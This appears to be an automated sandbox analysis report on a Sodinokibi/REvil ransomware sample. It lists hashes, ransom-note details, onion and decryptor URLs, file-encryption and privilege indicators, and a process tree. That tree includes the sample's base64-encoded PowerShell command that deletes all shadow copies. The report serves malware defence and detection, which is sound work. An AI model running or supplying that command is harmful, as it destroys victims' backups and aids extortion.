Analysis
-
max time kernel
144s -
max time network
155s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
24-01-2022 00:51
Static task
static1
Behavioral task
behavioral1
Sample
dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe
Resource
win10-en-20211208
General
-
Target
dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe
-
Size
114KB
-
MD5
bbde806cf2c6c3e298f5f829cc982646
-
SHA1
859ef1d0f73862575afc3d4034a610fe8c1ab9f4
-
SHA256
dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d
-
SHA512
6c22cc218270111e8fafb42b839185720e0a30ba93fb2195bb3b2c653648752f23e3f4ad574e28497e237f95ffe8c0c38611276dab3211d0f06ef13163cfd55b
Malware Config
Extracted
C:\5q4l83349-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9C258382A98B7E2A
http://decryptor.cc/9C258382A98B7E2A
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exedescription ioc process File renamed C:\Users\Admin\Pictures\UseResize.crw => \??\c:\users\admin\pictures\UseResize.crw.5q4l83349 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File renamed C:\Users\Admin\Pictures\DenyAssert.raw => \??\c:\users\admin\pictures\DenyAssert.raw.5q4l83349 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File renamed C:\Users\Admin\Pictures\EditInvoke.tif => \??\c:\users\admin\pictures\EditInvoke.tif.5q4l83349 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File renamed C:\Users\Admin\Pictures\ResumePing.tif => \??\c:\users\admin\pictures\ResumePing.tif.5q4l83349 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exedescription ioc process File opened (read-only) \??\Q: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\Y: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\E: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\G: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\I: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\L: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\M: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\B: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\K: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\N: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\R: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\V: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\W: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\X: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\D: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\J: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\O: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\P: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\S: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\T: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\A: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\F: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\H: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\U: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened (read-only) \??\Z: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w071987q.bmp" dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe -
Drops file in Program Files directory 31 IoCs
Processes:
dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exedescription ioc process File opened for modification \??\c:\program files\WriteRead.m4v dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\ConfirmRegister.mpeg3 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\RepairImport.css dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\SubmitMount.bmp dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\StartDismount.mpe dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File created \??\c:\program files\5q4l83349-readme.txt dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\CompleteSubmit.wps dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\MountSync.M2TS dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\NewFormat.dotx dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\UnregisterInitialize.contact dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\UpdateUninstall.rtf dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File created \??\c:\program files (x86)\5q4l83349-readme.txt dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\MountMove.shtml dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\NewCompare.doc dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\ReadStart.ods dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\StopPing.rar dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\UseSync.DVR-MS dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\ConvertCopy.inf dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\ConvertToUnlock.ogg dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\MeasureStart.potx dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\UnregisterRestart.asf dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\ApproveDebug.001 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\ConvertToSplit.vsw dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\JoinSplit.mp4v dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\OutInstall.wma dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\ProtectRead.jpg dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\SelectClose.ps1xml dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\CloseDisable.m1v dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\ImportPop.dib dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\InstallRevoke.rle dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe File opened for modification \??\c:\program files\DebugResolve.ram dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exepowershell.exepid process 2552 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe 2552 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe 1488 powershell.exe 1488 powershell.exe 1488 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2552 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeBackupPrivilege 3972 vssvc.exe Token: SeRestorePrivilege 3972 vssvc.exe Token: SeAuditPrivilege 3972 vssvc.exe Token: SeTakeOwnershipPrivilege 2552 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exedescription pid process target process PID 2552 wrote to memory of 1488 2552 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe powershell.exe PID 2552 wrote to memory of 1488 2552 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe"C:\Users\Admin\AppData\Local\Temp\dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2984
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3972
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1488-122-0x00000222AFC90000-0x00000222AFCB2000-memory.dmpFilesize
136KB
-
memory/1488-125-0x00000222ADDE0000-0x00000222ADEF0000-memory.dmpFilesize
1.1MB
-
memory/1488-126-0x00000222ADDE0000-0x00000222ADEF0000-memory.dmpFilesize
1.1MB
-
memory/1488-127-0x00000222C7E80000-0x00000222C7EF6000-memory.dmpFilesize
472KB